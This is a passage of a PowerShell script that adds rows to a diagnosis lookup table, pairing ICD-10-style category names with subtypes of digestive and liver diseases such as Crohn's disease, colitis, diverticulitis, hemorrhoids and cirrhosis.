$DiagnosisList.Rows.Add("Crohn's disease of small intestine with complications","Crohn's disease of small intestine with intestinal obstruction") + $null = $DiagnosisList.Rows.Add("Crohn's disease of small intestine with complications","Crohn's disease of small intestine with fistula") + $null = $DiagnosisList.Rows.Add("Crohn's disease of small intestine with complications","Crohn's disease of small intestine with abscess") + $null = $DiagnosisList.Rows.Add("Crohn's disease of small intestine with complications","Crohn's disease of small intestine with other complication") + $null = $DiagnosisList.Rows.Add("Crohn's disease of small intestine with complications","Crohn's disease of small intestine with unspecified complications") + $null = $DiagnosisList.Rows.Add("Crohn's disease of large intestine","Crohn's disease of large intestine without complications") + $null = $DiagnosisList.Rows.Add("Crohn's disease of large intestine with complications","Crohn's disease of large intestine with rectal bleeding") + $null = $DiagnosisList.Rows.Add("Crohn's disease of large intestine with complications","Crohn's disease of large intestine with intestinal obstruction") + $null = $DiagnosisList.Rows.Add("Crohn's disease of large intestine with complications","Crohn's disease of large intestine with fistula") + $null = $DiagnosisList.Rows.Add("Crohn's disease of large intestine with complications","Crohn's disease of large intestine with abscess") + $null = $DiagnosisList.Rows.Add("Crohn's disease of large intestine with complications","Crohn's disease of large intestine with other complication") + $null = $DiagnosisList.Rows.Add("Crohn's disease of large intestine with complications","Crohn's disease of large intestine with unspecified complications") + $null = $DiagnosisList.Rows.Add("Crohn's disease of both small and large intestine","Crohn's disease of both small and large intestine without complications") + $null = $DiagnosisList.Rows.Add("Crohn's disease of both small and large intestine with complications","Crohn's disease of both small and large intestine with rectal bleeding") + $null = $DiagnosisList.Rows.Add("Crohn's disease of both small and large intestine with complications","Crohn's disease of both small and large intestine with intestinal obstruction") + $null = $DiagnosisList.Rows.Add("Crohn's disease of both small and large intestine with complications","Crohn's disease of both small and large intestine with fistula") + $null = $DiagnosisList.Rows.Add("Crohn's disease of both small and large intestine with complications","Crohn's disease of both small and large intestine with abscess") + $null = $DiagnosisList.Rows.Add("Crohn's disease of both small and large intestine with complications","Crohn's disease of both small and large intestine with other complication") + $null = $DiagnosisList.Rows.Add("Crohn's disease of both small and large intestine with complications","Crohn's disease of both small and large intestine with unspecified complications") + $null = $DiagnosisList.Rows.Add("Crohn's disease, unspecified","Crohn's disease, unspecified, without complications") + $null = $DiagnosisList.Rows.Add("Crohn's disease, unspecified, with complications","Crohn's disease, unspecified, with rectal bleeding") + $null = $DiagnosisList.Rows.Add("Crohn's disease, unspecified, with complications","Crohn's disease, unspecified, with intestinal obstruction") + $null = $DiagnosisList.Rows.Add("Crohn's disease, unspecified, with complications","Crohn's disease, unspecified, with fistula") + $null = $DiagnosisList.Rows.Add("Crohn's disease, unspecified, with complications","Crohn's disease, unspecified, with abscess") + $null = $DiagnosisList.Rows.Add("Crohn's disease, unspecified, with complications","Crohn's disease, unspecified, with other complication") + $null = $DiagnosisList.Rows.Add("Crohn's disease, unspecified, with complications","Crohn's disease, unspecified, with unspecified complications") + $null = $DiagnosisList.Rows.Add("Ulcerative (chronic) pancolitis","Ulcerative (chronic) pancolitis without complications") + $null = $DiagnosisList.Rows.Add("Ulcerative (chronic) pancolitis with complications","Ulcerative (chronic) pancolitis with rectal bleeding") + $null = $DiagnosisList.Rows.Add("Ulcerative (chronic) pancolitis with complications","Ulcerative (chronic) pancolitis with intestinal obstruction") + $null = $DiagnosisList.Rows.Add("Ulcerative (chronic) pancolitis with complications","Ulcerative (chronic) pancolitis with fistula") + $null = $DiagnosisList.Rows.Add("Ulcerative (chronic) pancolitis with complications","Ulcerative (chronic) pancolitis with abscess") + $null = $DiagnosisList.Rows.Add("Ulcerative (chronic) pancolitis with complications","Ulcerative (chronic) pancolitis with other complication") + $null = $DiagnosisList.Rows.Add("Ulcerative (chronic) pancolitis with complications","Ulcerative (chronic) pancolitis with unspecified complications") + $null = $DiagnosisList.Rows.Add("Ulcerative (chronic) proctitis","Ulcerative (chronic) proctitis without complications") + $null = $DiagnosisList.Rows.Add("Ulcerative (chronic) proctitis with complications","Ulcerative (chronic) proctitis with rectal bleeding") + $null = $DiagnosisList.Rows.Add("Ulcerative (chronic) proctitis with complications","Ulcerative (chronic) proctitis with intestinal obstruction") + $null = $DiagnosisList.Rows.Add("Ulcerative (chronic) proctitis with complications","Ulcerative (chronic) proctitis with fistula") + $null = $DiagnosisList.Rows.Add("Ulcerative (chronic) proctitis with complications","Ulcerative (chronic) proctitis with abscess") + $null = $DiagnosisList.Rows.Add("Ulcerative (chronic) proctitis with complications","Ulcerative (chronic) proctitis with other complication") + $null = $DiagnosisList.Rows.Add("Ulcerative (chronic) proctitis with complications","Ulcerative (chronic) proctitis with unspecified complications") + $null = $DiagnosisList.Rows.Add("Ulcerative (chronic) rectosigmoiditis","Ulcerative (chronic) rectosigmoiditis without complications") + $null = $DiagnosisList.Rows.Add("Ulcerative (chronic) rectosigmoiditis with complications","Ulcerative (chronic) rectosigmoiditis with rectal bleeding") + $null = $DiagnosisList.Rows.Add("Ulcerative (chronic) rectosigmoiditis with complications","Ulcerative (chronic) rectosigmoiditis with intestinal obstruction") + $null = $DiagnosisList.Rows.Add("Ulcerative (chronic) rectosigmoiditis with complications","Ulcerative (chronic) rectosigmoiditis with fistula") + $null = $DiagnosisList.Rows.Add("Ulcerative (chronic) rectosigmoiditis with complications","Ulcerative (chronic) rectosigmoiditis with abscess") + $null = $DiagnosisList.Rows.Add("Ulcerative (chronic) rectosigmoiditis with complications","Ulcerative (chronic) rectosigmoiditis with other complication") + $null = $DiagnosisList.Rows.Add("Ulcerative (chronic) rectosigmoiditis with complications","Ulcerative (chronic) rectosigmoiditis with unspecified complications") + $null = $DiagnosisList.Rows.Add("Inflammatory polyps of colon","Inflammatory polyps of colon without complications") + $null = $DiagnosisList.Rows.Add("Inflammatory polyps of colon with complications","Inflammatory polyps of colon with rectal bleeding") + $null = $DiagnosisList.Rows.Add("Inflammatory polyps of colon with complications","Inflammatory polyps of colon with intestinal obstruction") + $null = $DiagnosisList.Rows.Add("Inflammatory polyps of colon with complications","Inflammatory polyps of colon with fistula") + $null = $DiagnosisList.Rows.Add("Inflammatory polyps of colon with complications","Inflammatory polyps of colon with abscess") + $null = $DiagnosisList.Rows.Add("Inflammatory polyps of colon with complications","Inflammatory polyps of colon with other complication") + $null = $DiagnosisList.Rows.Add("Inflammatory polyps of colon with complications","Inflammatory polyps of colon with unspecified complications") + $null = $DiagnosisList.Rows.Add("Left sided colitis","Left sided colitis without complications") + $null = $DiagnosisList.Rows.Add("Left sided colitis with complications","Left sided colitis with rectal bleeding") + $null = $DiagnosisList.Rows.Add("Left sided colitis with complications","Left sided colitis with intestinal obstruction") + $null = $DiagnosisList.Rows.Add("Left sided colitis with complications","Left sided colitis with fistula") + $null = $DiagnosisList.Rows.Add("Left sided colitis with complications","Left sided colitis with abscess") + $null = $DiagnosisList.Rows.Add("Left sided colitis with complications","Left sided colitis with other complication") + $null = $DiagnosisList.Rows.Add("Left sided colitis with complications","Left sided colitis with unspecified complications") + $null = $DiagnosisList.Rows.Add("Other ulcerative colitis","Other ulcerative colitis without complications") + $null = $DiagnosisList.Rows.Add("Other ulcerative colitis with complications","Other ulcerative colitis with rectal bleeding") + $null = $DiagnosisList.Rows.Add("Other ulcerative colitis with complications","Other ulcerative colitis with intestinal obstruction") + $null = $DiagnosisList.Rows.Add("Other ulcerative colitis with complications","Other ulcerative colitis with fistula") + $null = $DiagnosisList.Rows.Add("Other ulcerative colitis with complications","Other ulcerative colitis with abscess") + $null = $DiagnosisList.Rows.Add("Other ulcerative colitis with complications","Other ulcerative colitis with other complication") + $null = $DiagnosisList.Rows.Add("Other ulcerative colitis with complications","Other ulcerative colitis with unspecified complications") + $null = $DiagnosisList.Rows.Add("Ulcerative colitis, unspecified","Ulcerative colitis, unspecified, without complications") + $null = $DiagnosisList.Rows.Add("Ulcerative colitis, unspecified, with complications","Ulcerative colitis, unspecified with rectal bleeding") + $null = $DiagnosisList.Rows.Add("Ulcerative colitis, unspecified, with complications","Ulcerative colitis, unspecified with intestinal obstruction") + $null = $DiagnosisList.Rows.Add("Ulcerative colitis, unspecified, with complications","Ulcerative colitis, unspecified with fistula") + $null = $DiagnosisList.Rows.Add("Ulcerative colitis, unspecified, with complications","Ulcerative colitis, unspecified with abscess") + $null = $DiagnosisList.Rows.Add("Ulcerative colitis, unspecified, with complications","Ulcerative colitis, unspecified with other complication") + $null = $DiagnosisList.Rows.Add("Ulcerative colitis, unspecified, with complications","Ulcerative colitis, unspecified with unspecified complications") + $null = $DiagnosisList.Rows.Add("Other and unspecified noninfective gastroenteritis and colitis","Gastroenteritis and colitis due to radiation") + $null = $DiagnosisList.Rows.Add("Other and unspecified noninfective gastroenteritis and colitis","Toxic gastroenteritis and colitis") + $null = $DiagnosisList.Rows.Add("Allergic and dietetic gastroenteritis and colitis","Food protein-induced enterocolitis syndrome") + $null = $DiagnosisList.Rows.Add("Allergic and dietetic gastroenteritis and colitis","Food protein-induced enteropathy") + $null = $DiagnosisList.Rows.Add("Allergic and dietetic gastroenteritis and colitis","Other allergic and dietetic gastroenteritis and colitis") + $null = $DiagnosisList.Rows.Add("Indeterminate colitis","Indeterminate colitis") + $null = $DiagnosisList.Rows.Add("Other specified noninfective gastroenteritis and colitis","Eosinophilic gastritis or gastroenteritis") + $null = $DiagnosisList.Rows.Add("Other specified noninfective gastroenteritis and colitis","Eosinophilic colitis") + $null = $DiagnosisList.Rows.Add("Microscopic colitis","Collagenous colitis") + $null = $DiagnosisList.Rows.Add("Microscopic colitis","Lymphocytic colitis") + $null = $DiagnosisList.Rows.Add("Microscopic colitis","Other microscopic colitis") + $null = $DiagnosisList.Rows.Add("Microscopic colitis","Microscopic colitis, unspecified") + $null = $DiagnosisList.Rows.Add("Other specified noninfective gastroenteritis and colitis","Other specified noninfective gastroenteritis and colitis") + $null = $DiagnosisList.Rows.Add("Noninfective gastroenteritis and colitis, unspecified","Noninfective gastroenteritis and colitis, unspecified") + $null = $DiagnosisList.Rows.Add("Acute (reversible) ischemia of small intestine","Focal (segmental) acute (reversible) ischemia of small intestine") + $null = $DiagnosisList.Rows.Add("Acute (reversible) ischemia of small intestine","Diffuse acute (reversible) ischemia of small intestine") + $null = $DiagnosisList.Rows.Add("Acute (reversible) ischemia of small intestine","Acute (reversible) ischemia of small intestine, extent unspecified") + $null = $DiagnosisList.Rows.Add("Acute infarction of small intestine","Focal (segmental) acute infarction of small intestine") + $null = $DiagnosisList.Rows.Add("Acute infarction of small intestine","Diffuse acute infarction of small intestine") + $null = $DiagnosisList.Rows.Add("Acute infarction of small intestine","Acute infarction of small intestine, extent unspecified") + $null = $DiagnosisList.Rows.Add("Acute (reversible) ischemia of large intestine","Focal (segmental) acute (reversible) ischemia of large intestine") + $null = $DiagnosisList.Rows.Add("Acute (reversible) ischemia of large intestine","Diffuse acute (reversible) ischemia of large intestine") + $null = $DiagnosisList.Rows.Add("Acute (reversible) ischemia of large intestine","Acute (reversible) ischemia of large intestine, extent unspecified") + $null = $DiagnosisList.Rows.Add("Acute infarction of large intestine","Focal (segmental) acute infarction of large intestine") + $null = $DiagnosisList.Rows.Add("Acute infarction of large intestine","Diffuse acute infarction of large intestine") + $null = $DiagnosisList.Rows.Add("Acute infarction of large intestine","Acute infarction of large intestine, extent unspecified") + $null = $DiagnosisList.Rows.Add("Acute (reversible) ischemia of intestine, part unspecified","Focal (segmental) acute (reversible) ischemia of intestine, part unspecified") + $null = $DiagnosisList.Rows.Add("Acute (reversible) ischemia of intestine, part unspecified","Diffuse acute (reversible) ischemia of intestine, part unspecified") + $null = $DiagnosisList.Rows.Add("Acute (reversible) ischemia of intestine, part unspecified","Acute (reversible) ischemia of intestine, part and extent unspecified") + $null = $DiagnosisList.Rows.Add("Acute infarction of intestine, part unspecified","Focal (segmental) acute infarction of intestine, part unspecified") + $null = $DiagnosisList.Rows.Add("Acute infarction of intestine, part unspecified","Diffuse acute infarction of intestine, part unspecified") + $null = $DiagnosisList.Rows.Add("Acute infarction of intestine, part unspecified","Acute infarction of intestine, part and extent unspecified") + $null = $DiagnosisList.Rows.Add("Chronic vascular disorders of intestine","Chronic vascular disorders of intestine") + $null = $DiagnosisList.Rows.Add("Angiodysplasia of colon","Angiodysplasia of colon without hemorrhage") + $null = $DiagnosisList.Rows.Add("Angiodysplasia of colon","Angiodysplasia of colon with hemorrhage") + $null = $DiagnosisList.Rows.Add("Necrotizing enterocolitis","Necrotizing enterocolitis, unspecified") + $null = $DiagnosisList.Rows.Add("Necrotizing enterocolitis","Stage 1 necrotizing enterocolitis") + $null = $DiagnosisList.Rows.Add("Necrotizing enterocolitis","Stage 2 necrotizing enterocolitis") + $null = $DiagnosisList.Rows.Add("Necrotizing enterocolitis","Stage 3 necrotizing enterocolitis") + $null = $DiagnosisList.Rows.Add("Other vascular disorders of intestine","Other vascular disorders of intestine") + $null = $DiagnosisList.Rows.Add("Vascular disorder of intestine, unspecified","Vascular disorder of intestine, unspecified") + $null = $DiagnosisList.Rows.Add("Paralytic ileus and intestinal obstruction without hernia","Paralytic ileus") + $null = $DiagnosisList.Rows.Add("Paralytic ileus and intestinal obstruction without hernia","Intussusception") + $null = $DiagnosisList.Rows.Add("Paralytic ileus and intestinal obstruction without hernia","Volvulus") + $null = $DiagnosisList.Rows.Add("Paralytic ileus and intestinal obstruction without hernia","Gallstone ileus") + $null = $DiagnosisList.Rows.Add("Other impaction of intestine","Fecal impaction") + $null = $DiagnosisList.Rows.Add("Other impaction of intestine","Other impaction of intestine") + $null = $DiagnosisList.Rows.Add("Intestinal adhesions [bands] with obstruction (postinfection)","Intestinal adhesions [bands], unspecified as to partial versus complete obstruction") + $null = $DiagnosisList.Rows.Add("Intestinal adhesions [bands] with obstruction (postinfection)","Intestinal adhesions [bands], with partial obstruction") + $null = $DiagnosisList.Rows.Add("Intestinal adhesions [bands] with obstruction (postinfection)","Intestinal adhesions [bands] with complete obstruction") + $null = $DiagnosisList.Rows.Add("Unspecified intestinal obstruction","Partial intestinal obstruction, unspecified as to cause") + $null = $DiagnosisList.Rows.Add("Unspecified intestinal obstruction","Complete intestinal obstruction, unspecified as to cause") + $null = $DiagnosisList.Rows.Add("Unspecified intestinal obstruction","Unspecified intestinal obstruction, unspecified as to partial versus complete obstruction") + $null = $DiagnosisList.Rows.Add("Other intestinal obstruction","Other partial intestinal obstruction") + $null = $DiagnosisList.Rows.Add("Other intestinal obstruction","Other complete intestinal obstruction") + $null = $DiagnosisList.Rows.Add("Other intestinal obstruction","Other intestinal obstruction unspecified as to partial versus complete obstruction") + $null = $DiagnosisList.Rows.Add("Ileus, unspecified","Ileus, unspecified") + $null = $DiagnosisList.Rows.Add("Diverticulitis of small intestine with perforation and abscess","Diverticulitis of small intestine with perforation and abscess without bleeding") + $null = $DiagnosisList.Rows.Add("Diverticulitis of small intestine with perforation and abscess","Diverticulitis of small intestine with perforation and abscess with bleeding") + $null = $DiagnosisList.Rows.Add("Diverticular disease of small intestine without perforation or abscess","Diverticulosis of small intestine without perforation or abscess without bleeding") + $null = $DiagnosisList.Rows.Add("Diverticular disease of small intestine without perforation or abscess","Diverticulosis of small intestine without perforation or abscess with bleeding") + $null = $DiagnosisList.Rows.Add("Diverticular disease of small intestine without perforation or abscess","Diverticulitis of small intestine without perforation or abscess without bleeding") + $null = $DiagnosisList.Rows.Add("Diverticular disease of small intestine without perforation or abscess","Diverticulitis of small intestine without perforation or abscess with bleeding") + $null = $DiagnosisList.Rows.Add("Diverticulitis of large intestine with perforation and abscess","Diverticulitis of large intestine with perforation and abscess without bleeding") + $null = $DiagnosisList.Rows.Add("Diverticulitis of large intestine with perforation and abscess","Diverticulitis of large intestine with perforation and abscess with bleeding") + $null = $DiagnosisList.Rows.Add("Diverticular disease of large intestine without perforation or abscess","Diverticulosis of large intestine without perforation or abscess without bleeding") + $null = $DiagnosisList.Rows.Add("Diverticular disease of large intestine without perforation or abscess","Diverticulosis of large intestine without perforation or abscess with bleeding") + $null = $DiagnosisList.Rows.Add("Diverticular disease of large intestine without perforation or abscess","Diverticulitis of large intestine without perforation or abscess without bleeding") + $null = $DiagnosisList.Rows.Add("Diverticular disease of large intestine without perforation or abscess","Diverticulitis of large intestine without perforation or abscess with bleeding") + $null = $DiagnosisList.Rows.Add("Diverticulitis of both small and large intestine with perforation and abscess","Diverticulitis of both small and large intestine with perforation and abscess without bleeding") + $null = $DiagnosisList.Rows.Add("Diverticulitis of both small and large intestine with perforation and abscess","Diverticulitis of both small and large intestine with perforation and abscess with bleeding") + $null = $DiagnosisList.Rows.Add("Diverticular disease of both small and large intestine without perforation or abscess","Diverticulosis of both small and large intestine without perforation or abscess without bleeding") + $null = $DiagnosisList.Rows.Add("Diverticular disease of both small and large intestine without perforation or abscess","Diverticulosis of both small and large intestine without perforation or abscess with bleeding") + $null = $DiagnosisList.Rows.Add("Diverticular disease of both small and large intestine without perforation or abscess","Diverticulitis of both small and large intestine without perforation or abscess without bleeding") + $null = $DiagnosisList.Rows.Add("Diverticular disease of both small and large intestine without perforation or abscess","Diverticulitis of both small and large intestine without perforation or abscess with bleeding") + $null = $DiagnosisList.Rows.Add("Diverticulitis of intestine, part unspecified, with perforation and abscess","Diverticulitis of intestine, part unspecified, with perforation and abscess without bleeding") + $null = $DiagnosisList.Rows.Add("Diverticulitis of intestine, part unspecified, with perforation and abscess","Diverticulitis of intestine, part unspecified, with perforation and abscess with bleeding") + $null = $DiagnosisList.Rows.Add("Diverticular disease of intestine, part unspecified, without perforation or abscess","Diverticulosis of intestine, part unspecified, without perforation or abscess without bleeding") + $null = $DiagnosisList.Rows.Add("Diverticular disease of intestine, part unspecified, without perforation or abscess","Diverticulosis of intestine, part unspecified, without perforation or abscess with bleeding") + $null = $DiagnosisList.Rows.Add("Diverticular disease of intestine, part unspecified, without perforation or abscess","Diverticulitis of intestine, part unspecified, without perforation or abscess without bleeding") + $null = $DiagnosisList.Rows.Add("Diverticular disease of intestine, part unspecified, without perforation or abscess","Diverticulitis of intestine, part unspecified, without perforation or abscess with bleeding") + $null = $DiagnosisList.Rows.Add("Irritable bowel syndrome","Irritable bowel syndrome with diarrhea") + $null = $DiagnosisList.Rows.Add("Irritable bowel syndrome","Irritable bowel syndrome with constipation") + $null = $DiagnosisList.Rows.Add("Irritable bowel syndrome","Mixed irritable bowel syndrome") + $null = $DiagnosisList.Rows.Add("Irritable bowel syndrome","Other irritable bowel syndrome") + $null = $DiagnosisList.Rows.Add("Irritable bowel syndrome","Irritable bowel syndrome without diarrhea") + $null = $DiagnosisList.Rows.Add("Constipation","Constipation, unspecified") + $null = $DiagnosisList.Rows.Add("Constipation","Slow transit constipation") + $null = $DiagnosisList.Rows.Add("Constipation","Outlet dysfunction constipation") + $null = $DiagnosisList.Rows.Add("Constipation","Drug induced constipation") + $null = $DiagnosisList.Rows.Add("Constipation","Chronic idiopathic constipation") + $null = $DiagnosisList.Rows.Add("Constipation","Other constipation") + $null = $DiagnosisList.Rows.Add("Functional diarrhea","Functional diarrhea") + $null = $DiagnosisList.Rows.Add("Neurogenic bowel, not elsewhere classified","Neurogenic bowel, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Megacolon, not elsewhere classified","Toxic megacolon") + $null = $DiagnosisList.Rows.Add("Megacolon, not elsewhere classified","Other megacolon") + $null = $DiagnosisList.Rows.Add("Anal spasm","Anal spasm") + $null = $DiagnosisList.Rows.Add("Other specified functional intestinal disorders","Other specified functional intestinal disorders") + $null = $DiagnosisList.Rows.Add("Functional intestinal disorder, unspecified","Functional intestinal disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Fissure and fistula of anal and rectal regions","Acute anal fissure") + $null = $DiagnosisList.Rows.Add("Fissure and fistula of anal and rectal regions","Chronic anal fissure") + $null = $DiagnosisList.Rows.Add("Fissure and fistula of anal and rectal regions","Anal fissure, unspecified") + $null = $DiagnosisList.Rows.Add("Fissure and fistula of anal and rectal regions","Anal fistula") + $null = $DiagnosisList.Rows.Add("Fissure and fistula of anal and rectal regions","Rectal fistula") + $null = $DiagnosisList.Rows.Add("Fissure and fistula of anal and rectal regions","Anorectal fistula") + $null = $DiagnosisList.Rows.Add("Abscess of anal and rectal regions","Anal abscess") + $null = $DiagnosisList.Rows.Add("Abscess of anal and rectal regions","Rectal abscess") + $null = $DiagnosisList.Rows.Add("Abscess of anal and rectal regions","Anorectal abscess") + $null = $DiagnosisList.Rows.Add("Abscess of anal and rectal regions","Ischiorectal abscess") + $null = $DiagnosisList.Rows.Add("Abscess of anal and rectal regions","Intrasphincteric abscess") + $null = $DiagnosisList.Rows.Add("Other diseases of anus and rectum","Anal polyp") + $null = $DiagnosisList.Rows.Add("Other diseases of anus and rectum","Rectal polyp") + $null = $DiagnosisList.Rows.Add("Other diseases of anus and rectum","Anal prolapse") + $null = $DiagnosisList.Rows.Add("Other diseases of anus and rectum","Rectal prolapse") + $null = $DiagnosisList.Rows.Add("Other diseases of anus and rectum","Stenosis of anus and rectum") + $null = $DiagnosisList.Rows.Add("Other diseases of anus and rectum","Hemorrhage of anus and rectum") + $null = $DiagnosisList.Rows.Add("Other diseases of anus and rectum","Ulcer of anus and rectum") + $null = $DiagnosisList.Rows.Add("Other diseases of anus and rectum","Radiation proctitis") + $null = $DiagnosisList.Rows.Add("Other specified diseases of anus and rectum","Anal sphincter tear (healed) (nontraumatic) (old)") + $null = $DiagnosisList.Rows.Add("Other specified diseases of anus and rectum","Dysplasia of anus") + $null = $DiagnosisList.Rows.Add("Other specified diseases of anus and rectum","Other specified diseases of anus and rectum") + $null = $DiagnosisList.Rows.Add("Disease of anus and rectum, unspecified","Disease of anus and rectum, unspecified") + $null = $DiagnosisList.Rows.Add("Other diseases of intestine","Abscess of intestine") + $null = $DiagnosisList.Rows.Add("Other diseases of intestine","Perforation of intestine (nontraumatic)") + $null = $DiagnosisList.Rows.Add("Other diseases of intestine","Fistula of intestine") + $null = $DiagnosisList.Rows.Add("Other diseases of intestine","Ulcer of intestine") + $null = $DiagnosisList.Rows.Add("Other diseases of intestine","Enteroptosis") + $null = $DiagnosisList.Rows.Add("Other diseases of intestine","Polyp of colon") + $null = $DiagnosisList.Rows.Add("Other specified diseases of intestine","Dieulafoy lesion of intestine") + $null = $DiagnosisList.Rows.Add("Other specified diseases of intestine","Other specified diseases of intestine") + $null = $DiagnosisList.Rows.Add("Disease of intestine, unspecified","Disease of intestine, unspecified") + $null = $DiagnosisList.Rows.Add("Hemorrhoids and perianal venous thrombosis","First degree hemorrhoids") + $null = $DiagnosisList.Rows.Add("Hemorrhoids and perianal venous thrombosis","Second degree hemorrhoids") + $null = $DiagnosisList.Rows.Add("Hemorrhoids and perianal venous thrombosis","Third degree hemorrhoids") + $null = $DiagnosisList.Rows.Add("Hemorrhoids and perianal venous thrombosis","Fourth degree hemorrhoids") + $null = $DiagnosisList.Rows.Add("Hemorrhoids and perianal venous thrombosis","Residual hemorrhoidal skin tags") + $null = $DiagnosisList.Rows.Add("Hemorrhoids and perianal venous thrombosis","Perianal venous thrombosis") + $null = $DiagnosisList.Rows.Add("Hemorrhoids and perianal venous thrombosis","Other hemorrhoids") + $null = $DiagnosisList.Rows.Add("Hemorrhoids and perianal venous thrombosis","Unspecified hemorrhoids") + $null = $DiagnosisList.Rows.Add("Peritonitis","Generalized (acute) peritonitis") + $null = $DiagnosisList.Rows.Add("Peritonitis","Peritoneal abscess") + $null = $DiagnosisList.Rows.Add("Peritonitis","Spontaneous bacterial peritonitis") + $null = $DiagnosisList.Rows.Add("Peritonitis","Choleperitonitis") + $null = $DiagnosisList.Rows.Add("Peritonitis","Sclerosing mesenteritis") + $null = $DiagnosisList.Rows.Add("Peritonitis","Other peritonitis") + $null = $DiagnosisList.Rows.Add("Peritonitis","Peritonitis, unspecified") + $null = $DiagnosisList.Rows.Add("Other disorders of peritoneum","Peritoneal adhesions (postprocedural) (postinfection)") + $null = $DiagnosisList.Rows.Add("Other disorders of peritoneum","Hemoperitoneum") + $null = $DiagnosisList.Rows.Add("Other disorders of peritoneum","Other specified disorders of peritoneum") + $null = $DiagnosisList.Rows.Add("Other disorders of peritoneum","Disorder of peritoneum, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of peritoneum in infectious diseases classified elsewhere","Disorders of peritoneum in infectious diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Retroperitoneal abscess","Postprocedural retroperitoneal abscess") + $null = $DiagnosisList.Rows.Add("Retroperitoneal abscess","Psoas muscle abscess") + $null = $DiagnosisList.Rows.Add("Retroperitoneal abscess","Other retroperitoneal abscess") + $null = $DiagnosisList.Rows.Add("Other disorders of retroperitoneum","Other disorders of retroperitoneum") + $null = $DiagnosisList.Rows.Add("Alcoholic liver disease","Alcoholic fatty liver") + $null = $DiagnosisList.Rows.Add("Alcoholic hepatitis","Alcoholic hepatitis without ascites") + $null = $DiagnosisList.Rows.Add("Alcoholic hepatitis","Alcoholic hepatitis with ascites") + $null = $DiagnosisList.Rows.Add("Alcoholic fibrosis and sclerosis of liver","Alcoholic fibrosis and sclerosis of liver") + $null = $DiagnosisList.Rows.Add("Alcoholic cirrhosis of liver","Alcoholic cirrhosis of liver without ascites") + $null = $DiagnosisList.Rows.Add("Alcoholic cirrhosis of liver","Alcoholic cirrhosis of liver with ascites") + $null = $DiagnosisList.Rows.Add("Alcoholic hepatic failure","Alcoholic hepatic failure without coma") + $null = $DiagnosisList.Rows.Add("Alcoholic hepatic failure","Alcoholic hepatic failure with coma") + $null = $DiagnosisList.Rows.Add("Alcoholic liver disease, unspecified","Alcoholic liver disease, unspecified") + $null = $DiagnosisList.Rows.Add("Toxic liver disease","Toxic liver disease with cholestasis") + $null = $DiagnosisList.Rows.Add("Toxic liver disease with hepatic necrosis","Toxic liver disease with hepatic necrosis, without coma") + $null = $DiagnosisList.Rows.Add("Toxic liver disease with hepatic necrosis","Toxic liver disease with hepatic necrosis, with coma") + $null = $DiagnosisList.Rows.Add("Toxic liver disease with acute hepatitis","Toxic liver disease with acute hepatitis") + $null = $DiagnosisList.Rows.Add("Toxic liver disease with chronic persistent hepatitis","Toxic liver disease with chronic persistent hepatitis") + $null = $DiagnosisList.Rows.Add("Toxic liver disease with chronic lobular hepatitis","Toxic liver disease with chronic lobular hepatitis") + $null = $DiagnosisList.Rows.Add("Toxic liver disease with chronic active hepatitis","Toxic liver disease with chronic active hepatitis without ascites") + $null = $DiagnosisList.Rows.Add("Toxic liver disease with chronic active hepatitis","Toxic liver disease with chronic active hepatitis with ascites") + $null = $DiagnosisList.Rows.Add("Toxic liver disease with hepatitis, not elsewhere classified","Toxic liver disease with hepatitis, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Toxic liver disease with fibrosis and cirrhosis of liver","Toxic liver disease with fibrosis and cirrhosis of liver") + $null = $DiagnosisList.Rows.Add("Toxic liver disease with other disorders of liver","Toxic liver disease with other disorders of liver") + $null = $DiagnosisList.Rows.Add("Toxic liver disease, unspecified","Toxic liver disease, unspecified") + $null = $DiagnosisList.Rows.Add("Acute and subacute hepatic failure","Acute and subacute hepatic failure without coma") + $null = $DiagnosisList.Rows.Add("Acute and subacute hepatic failure","Acute and subacute hepatic failure with coma") + $null = $DiagnosisList.Rows.Add("Chronic hepatic failure","Chronic hepatic failure without coma") + $null = $DiagnosisList.Rows.Add("Chronic hepatic failure","Chronic hepatic failure with coma") + $null = $DiagnosisList.Rows.Add("Hepatic failure, unspecified","Hepatic failure, unspecified without coma") + $null = $DiagnosisList.Rows.Add("Hepatic failure, unspecified","Hepatic failure, unspecified with coma") + $null = $DiagnosisList.Rows.Add("Chronic hepatitis, not elsewhere classified","Chronic persistent hepatitis, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Chronic hepatitis, not elsewhere classified","Chronic lobular hepatitis, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Chronic hepatitis, not elsewhere classified","Chronic active hepatitis, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Chronic hepatitis, not elsewhere classified","Other chronic hepatitis, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Chronic hepatitis, not elsewhere classified","Chronic hepatitis, unspecified") + $null = $DiagnosisList.Rows.Add("Fibrosis and cirrhosis of liver","Hepatic fibrosis") + $null = $DiagnosisList.Rows.Add("Fibrosis and cirrhosis of liver","Hepatic sclerosis") + $null = $DiagnosisList.Rows.Add("Fibrosis and cirrhosis of liver","Hepatic fibrosis with hepatic sclerosis") + $null = $DiagnosisList.Rows.Add("Fibrosis and cirrhosis of liver","Primary biliary cirrhosis") + $null = $DiagnosisList.Rows.Add("Fibrosis and cirrhosis of liver","Secondary biliary cirrhosis") + $null = $DiagnosisList.Rows.Add("Fibrosis and cirrhosis of liver","Biliary cirrhosis, unspecified") + $null = $DiagnosisList.Rows.Add("Other and unspecified cirrhosis of liver","Unspecified cirrhosis of liver") + $null = $DiagnosisList.Rows.Add("Other and unspecified cirrhosis of liver","Other cirrhosis of liver") + $null = $DiagnosisList.Rows.Add("Other inflammatory liver diseases","Abscess of liver") + $null = $DiagnosisList.Rows.Add("Other inflammatory liver diseases","Phlebitis of portal vein") + $null = $DiagnosisList.Rows.Add("Other inflammatory liver diseases","Nonspecific reactive hepatitis") + $null = $DiagnosisList.Rows.Add("Other inflammatory liver diseases","Granulomatous hepatitis, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other inflammatory liver diseases","Autoimmune hepatitis") + $null = $DiagnosisList.Rows.Add("Other specified inflammatory liver diseases","Nonalcoholic steatohepatitis (NASH)") + $null = $DiagnosisList.Rows.Add("Other specified inflammatory liver diseases","Other specified inflammatory liver diseases") + $null = $DiagnosisList.Rows.Add("Inflammatory liver disease, unspecified","Inflammatory liver disease, unspecified") + $null = $DiagnosisList.Rows.Add("Other diseases of liver","Fatty (change of) liver, not 